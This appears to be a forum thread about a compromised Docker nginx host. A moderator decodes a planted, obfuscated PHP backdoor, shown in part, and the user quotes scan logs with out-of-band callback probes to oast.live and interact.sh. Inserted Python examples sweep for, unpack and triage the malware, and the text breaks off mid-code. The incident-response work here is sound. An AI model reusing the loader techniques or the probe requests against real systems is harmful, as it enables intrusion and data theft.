nginx log error under docker

sharpshooter

Registered
Hi, for some time now I've been noticing an error in the nginx log that is breaking several web services - plex, nextcloud, wordpress and others, which are basically all proxied through nginx.
Can anyone help?
Code:
nginx: [crit] pread() "/config/nginx/site-confs/xt" failed (21: Is a directory)
In that directory I have an index.php with the following content, if that matters at all:
Code:
<?php /*** PHP Encode v1.0 by zeura.com ***/ $XnNhAWEnhoiqwciqpoHH=file(__FILE__);eval(base64_decode("aWYoIWZ1bmN0aW9uX2V4aXN0cygiWWl1bklVWTc2YkJodWhOWUlPOCIpKXtmdW5>
 

anonimen

Super Moderator
That doesn't look like the whole content of index.php, if everything is right. When I ran the string that's passed to base64 decode through a decoder, this came out:

if(!function_exists("YiunIUY76bBhuhNYIO8")){fun

The eval itself is pretty suspicious.. if you post the whole index.php, maybe we can see whether there's anything worrying in the eval'd code.
Have you noticed anything else odd?
 

sharpshooter

Registered
Sorry, I didn't realise the whole file would be needed. Here it is:
Otherwise I haven't noticed anything strange, but I admit I haven't looked at the log files in a long time.
 

anonimen

Super Moderator
Decoded, the file contains an eval of this code:

PHP:
<?php
if (!function_exists("YiunIUY76bBhuhNYIO8"))
{
    function YiunIUY76bBhuhNYIO8($g, $b = 0)
    {
        $a = implode("\n", $g);
        $d = array(
            655,
            236,
            40
        );
        if ($b == 0) $f = substr($a, $d[0], $d[1]);
        elseif ($b == 1) $f = substr($a, $d[0] + $d[1], $d[2]);
        else $f = trim(substr($a, $d[0] + $d[1] + $d[2]));
        return ($f);
    }
}

I don't know what that could be.

But looking at what the error is, I'm starting to doubt that the content of the file specifically matters.
 

sharpshooter

Registered
I also don't think the content is the problem. The point is that this content wasn't there a while ago.

That directory is completely unfamiliar to me and it exists in every single subdirectory of nginx. And that very directory is the one in the error. I'm starting to worry that something bad has happened.
 

anonimen

Super Moderator
That directory is completely unfamiliar to me and it exists in every single subdirectory of nginx. And that very directory is the one in the error. I'm starting to worry that something bad has happened.
That's exactly what I was asking, whether there's anything else odd. If the same one is in every directory, it sounds like someone malicious has dumped them there. I'd suggest looking for other suspicious newly appeared folders/files too.
 

deam0n

Super Moderator
It definitely looks like something that shouldn't be there.
 

sharpshooter

Registered
That's exactly what I was asking, whether there's anything else odd. If the same one is in every directory, it sounds like someone malicious has dumped them there. I'd suggest looking for other suspicious newly appeared folders/files too.
Where do you suggest I look for those - in the Nginx directory, or?
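
For the sweep anonimen suggests and the question of where to look, here is an added example (not from the thread and not anyone's code in it): a Python script that walks a directory tree and reports directories named xt plus files carrying the markers visible in the posted index.php (the zeura.com banner, an eval() fed by a decoder chain, a __halt_compiler(); followed by a payload). Run it against the host-side bind mount of the container's /config (the error names /config/nginx/site-confs/xt) and against the other containers' volumes, not only the nginx tree. The marker list, the demo tree and the record layout are assumptions made for the example.

```python
import os
import re
import tempfile
from typing import Dict, List, Tuple

# Indicators drawn from the thread: a directory named "xt" dropped into every nginx
# config sub-directory, and an index.php that opens with the zeura.com "PHP Encode"
# banner and evals a base64 blob. Extend both lists with whatever else turns up.
SUSPECT_DIR_NAMES = {"xt"}
CONTENT_MARKERS: List[Tuple[str, re.Pattern]] = [
    ("zeura-banner", re.compile(rb"PHP Encode v1\.0 by zeura\.com")),
    ("eval-decoder-chain", re.compile(rb"eval\s*\(\s*(?:gzinflate|gzuncompress|str_rot13|base64_decode)\s*\(")),
    ("halt-compiler-payload", re.compile(rb"__halt_compiler\s*\(\s*\)\s*;")),
]
MAX_READ = 256 * 1024  # the markers sit at the top of the file; no need to read huge uploads


def scan_file(path: str) -> List[str]:
    """Names of the content markers found in the first MAX_READ bytes of path."""
    try:
        with open(path, "rb") as fh:
            head = fh.read(MAX_READ)
    except OSError:
        return []
    return [name for name, rx in CONTENT_MARKERS if rx.search(head)]


def _record(root: str, full: str, kind: str, why: List[str]) -> Dict:
    st = os.lstat(full)
    return {"rel": os.path.relpath(full, root), "kind": kind, "why": why,
            "mtime": st.st_mtime, "ctime": st.st_ctime,
            "uid": st.st_uid, "mode": oct(st.st_mode & 0o777)}


def sweep(root: str) -> List[Dict]:
    """Walk root (e.g. the host-side /config volume of the nginx container) and list
    suspect directories and files, oldest ctime first, as raw material for a timeline."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            if d in SUSPECT_DIR_NAMES:
                findings.append(_record(root, os.path.join(dirpath, d), "dir", ["suspect-dir-name"]))
        for f in filenames:
            full = os.path.join(dirpath, f)
            if os.path.islink(full):
                continue
            why = scan_file(full)
            if why:
                findings.append(_record(root, full, "file", why))
    # ctime (inode change time) cannot be set with touch/utimes, unlike mtime,
    # so it is the more trustworthy "when did this appear" value.
    findings.sort(key=lambda r: r["ctime"])
    return findings


def build_demo_tree() -> str:
    """Constructed stand-in for a dropped nginx config tree (not real malware): a clean
    site config plus two planted xt/index.php files shaped like the one in the thread."""
    root = tempfile.mkdtemp(prefix="nginx-sweep-demo-")
    files = {
        "site-confs/default": "server { listen 80; root /config/www; }\n",
        "xt/index.php": '<?php /*** PHP Encode v1.0 by zeura.com ***/ $x=file(__FILE__);'
                        'eval(base64_decode("aWYoMSk7")); __halt_compiler(); QUJDRA==\n',
        "proxy-confs/xt/index.php": '<?php eval(gzinflate(base64_decode("eJwDAAAAAAE=")));\n',
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else build_demo_tree()
    for r in sweep(root):
        print(f"{r['ctime']:.0f} {r['kind']:4} {r['mode']} uid={r['uid']} {r['rel']}  {','.join(r['why'])}")
```

It sorts by ctime rather than mtime because mtime can be reset with touch while the inode change time cannot, which makes it the better anchor when the findings are later lined up against the access logs. Everything it prints is a lead to confirm, not a verdict, and a clean run is not proof that the host is clean.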
 

Revelation

Super Moderator
Decoded, the file contains an eval of this code:

PHP:
<?php
if (!function_exists("YiunIUY76bBhuhNYIO8"))
{
    function YiunIUY76bBhuhNYIO8($g, $b = 0)
    {
        $a = implode("\n", $g);
        $d = array(
            655,
            236,
            40
        );
        if ($b == 0) $f = substr($a, $d[0], $d[1]);
        elseif ($b == 1) $f = substr($a, $d[0] + $d[1], $d[2]);
        else $f = trim(substr($a, $d[0] + $d[1] + $d[2]));
        return ($f);
    }
}

I don't know what that could be.

But looking at what the error is, I'm starting to doubt that the content of the file specifically matters.
That's not all that's in there. There are several functions inside. This one specifically strips the beginning of this file, which actually contains those functions; after that there's a __halt_compiler(); to stop the PHP parser from parsing the binary code after __halt_compiler(), which is the code that actually runs. The code is unreadable because one of the functions compresses the content and then decompresses and executes it.

This trick is used to shrink installer files, and also by malware. It's possible the compressed code walks your whole filesystem recursively and sends assorted files back and forth... Given that it appears several times in the nginx directory, I doubt these are installer files for PHP extensions.

I'll try to work out exactly which script is being executed.

If you think the other files contain different code, post that too so we can see what's in it (if I manage to extract the code).
 

sharpshooter

Registered
Thanks a lot for the time you've spent, really!

The people maintaining the nginx container said these php files may be mining software.

Here are a few more files from the xt directories:
https://paste.kodi.tv/movapobeke - the main directory in the nginx config
https://paste.kodi.tv/esofoguyoq - the proxy-confs directory

If there's any difference, I'll find the other directories too.

Unfortunately it's likely that the whole host is compromised, not just the container.
 

Revelation

Super Moderator
Anything is possible. If it's mining software you can run
Bash:
docker stats
to see whether it's using a lot of CPU. And
Bash:
docker top <container>
to see whether there are any suspicious processes running in the container.
 

sharpshooter

Registered
Hm, thanks! I have a droppy container, which is for file sharing. Everything was fine until I started it - now it's running at 68.87%, everything else more serious is at 1-2% max.

Here's something else interesting from that container's log:
A process starts that contains http://interact.sh/ and the explanation is as follows:
This tool can generate specific domain names to help its users test whether an exploit is successful.
In the log I also notice a domain, again from the same IP:
2022-06-05 00:48:18 [INFO] 176.113.115.238:34090 GET /wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://caatb5ho6n6agto00010ekwgheiuas916.oast.live [401] [1ms],

Here's the process:
Code:
2022-05-20 04:36:17 [INFO] 176.113.115.238:50994 GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://interact.sh/ [400] [0ms] Invalid GET: /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://interact.sh/,
EDIT: Maybe that bit about the process isn't quite right for droppy, because nginx also went up to 120% when I start it. I don't know whether that's normal, but...
 
Last edited:

Revelation

Super Moderator
Here's what came out of the first file:


Whoever feels like reading it, read on :D

P.S. I had a quick read... this thing reads the most important files in the filesystem. Since you're in a container, probably nothing important will come out, but still... this is a clean backdoor.

As I suspected, there's code for recursive directory reading and there are some download functions... looking at it, he's even made his life easier so he can display the file contents directly in the page he has secretly opened.
 
Last edited:

Revelation

Super Moderator
I checked the other files too. The content is the same.

Here's the code I used to extract them. I reused the internal functions, so it's unlikely to work for other such files unless they were generated from the same place, since the initial part is boilerplate code to run the real code.
PHP:
<?php
function findImportantStuff($g, $b = 0)
{
    $a = implode("\n", $g);
    $d = array(
        655,
        236,
        40
    );
    if ($b == 0) $f = substr($a, $d[0], $d[1]);
    elseif ($b == 1) $f = substr($a, $d[0] + $d[1], $d[2]);
    else $f = trim(substr($a, $d[0] + $d[1] + $d[2]));
    return ($f);
}

function showRealContent($phpFileContent)
{
    // imitates file(): the loader's helper expects an array of lines
    $contentAsArray = [$phpFileContent];

    // slice 2 = everything after the boilerplate: base64-encoded, deflated PHP
    $uncompressed = gzinflate(base64_decode(findImportantStuff($contentAsArray, 2)));

    // the inflated stage is itself an eval(...("<base64>")); pull out the inner blob
    preg_match('#eval.*\("(.*?)"\)#', $uncompressed, $matches);

    return utf8_encode(base64_decode($matches[1]));
}

echo showRealContent(<<<'T'
<?php /*** PHP Encode v1.0 by zeura.com ***/...rest of the file...
T
);
 
Last edited:
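An added example, not Revelation's code and not the malware's own: a Python unpacker that does the same job statically and a bit more generally. Instead of the fixed 655/236/40 offsets it carves the blob after the __halt_compiler(); marker Revelation describes (an assumption about the layout), inflates it, and then keeps peeling eval(<decoder chain>("...")) wrappers (base64_decode, gzinflate, gzuncompress, str_rot13) until plain PHP remains. Nothing is ever executed. Since the thread's file is only linked, the block builds a constructed specimen with the same layering and a harmless stand-in body.

```python
import base64
import codecs
import re
import zlib
from typing import List

# eval(<decoder chain>("<blob>")), e.g. eval(base64_decode("...")) or
# eval(gzinflate(base64_decode("..."))); the chain is undone inner-most first.
WRAPPER_RE = re.compile(
    r'eval\s*\((?P<chain>(?:\s*(?:gzinflate|gzuncompress|str_rot13|base64_decode)\s*\()+)'
    r'\s*["\'](?P<blob>[A-Za-z0-9+/=\s]*)["\']',
    re.S,
)
HALT = "__halt_compiler();"


def gzinflate(data: bytes) -> bytes:
    """PHP gzinflate(): raw DEFLATE with no zlib/gzip header (wbits=-15)."""
    return zlib.decompress(data, -15)


def gzdeflate(data: bytes) -> bytes:
    """PHP gzdeflate(); only used here to build the constructed specimen."""
    c = zlib.compressobj(level=9, wbits=-15)
    return c.compress(data) + c.flush()


def apply_chain(names: List[str], blob: str) -> str:
    """Undo a chain such as ['gzinflate', 'base64_decode'] statically, never via eval."""
    data = blob.encode()
    for fn in reversed(names):  # source order is outer-most first
        if fn == "base64_decode":
            data = base64.b64decode(re.sub(rb"\s+", b"", data))
        elif fn == "gzinflate":
            data = gzinflate(data)
        elif fn == "gzuncompress":
            data = zlib.decompress(data)  # zlib-wrapped, unlike gzinflate
        elif fn == "str_rot13":
            data = codecs.encode(data.decode("latin-1"), "rot_13").encode("latin-1")
    return data.decode("utf-8", errors="replace")


def carve_payload(src: str) -> bytes:
    """Everything after __halt_compiler(); is the blob the loader base64-decodes and inflates.
    Assumption taken from the thread's description; the real loader addresses it by fixed offsets."""
    idx = src.find(HALT)
    if idx < 0:
        raise ValueError("no __halt_compiler(); marker: different loader, carve by hand")
    tail = src[idx + len(HALT):]
    return base64.b64decode(re.sub(r"[^A-Za-z0-9+/=]", "", tail))


def unwrap_layers(code: str, max_layers: int = 10) -> List[str]:
    """Peel eval(...) wrappers until plain PHP remains (max_layers guards against loops)."""
    layers = [code]
    for _ in range(max_layers):
        m = WRAPPER_RE.search(layers[-1])
        if not m:
            break
        names = re.findall(r"[a-z0-9_]+", m.group("chain"))
        layers.append(apply_chain(names, m.group("blob")))
    return layers


def unpack(src: str) -> List[str]:
    """Layer 0 = inflated blob behind __halt_compiler(); later layers = each eval stage."""
    return unwrap_layers(gzinflate(carve_payload(src)).decode("utf-8", errors="replace"))


def build_specimen(final_code: str) -> str:
    """Constructed specimen (not the thread's file) with the same layering:
    stub + __halt_compiler(); + base64(gzdeflate( eval(gzinflate(base64_decode("<final>"))) ))."""
    stub = "<?php /*** PHP Encode v1.0 by zeura.com ***/ $x=file(__FILE__); /* loader omitted */ " + HALT
    inner = base64.b64encode(gzdeflate(final_code.encode())).decode()
    stage1 = '<?php eval(gzinflate(base64_decode("%s")));' % inner
    return stub + "\n" + base64.b64encode(gzdeflate(stage1.encode())).decode() + "\n"


# Harmless stand-in for the file-reading backdoor body described in the thread.
SPECIMEN_FINAL = '<?php foreach (glob("/etc/*") as $f) echo htmlspecialchars(file_get_contents($f));'
SPECIMEN = build_specimen(SPECIMEN_FINAL)

if __name__ == "__main__":
    for i, layer in enumerate(unpack(SPECIMEN)):
        print(f"--- layer {i} ---\n{layer}\n")
```

Because every stage is decoded in Python rather than handed to PHP, the sample can be unpacked on an analysis box without any risk of running it; if the last layer still contains an eval() that this regex does not recognise, that is the point at which to read the loader by hand rather than widen the decoder blindly.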

sharpshooter

Registered
Thanks a lot for everything!

Does this mean I should delete everything from the server? And are there infected files?
Actually, does it use nginx to display the files? I just still can't picture what happened.
 

uphero

Registered
Before you delete anything, go through the logs to find out when and, above all, how these files appeared.
 

sharpshooter

Registered
OK, I'll try, but there's an awful lot of information in the logs, I'll need to boil it down somehow.
I'll try this way and see whether I find anything:

It turned out droppy has some Path Traversal vulnerability and it seems that's where the problem is. Right, since it's proxied through nginx, it should show up in the nginx log if it's something to do with droppy?
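
For boiling the logs down, an added example (not from the thread): a Python triage pass over droppy-style lines like the ones posted above and over nginx combined access-log lines, since the same request appears in both when droppy or WordPress sits behind the proxy. It flags interactsh-style out-of-band callback hosts (interact.sh, oast.*), directory traversal in raw, URL-encoded and double-encoded form, and the overlong /?unix:AAAA... filler probe, then groups the hits per source IP with first/last seen. The sample lines are constructed with documentation IPs and a made-up OAST label; the regexes assume the two line formats shown on this page.

```python
import re
from collections import OrderedDict
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import unquote

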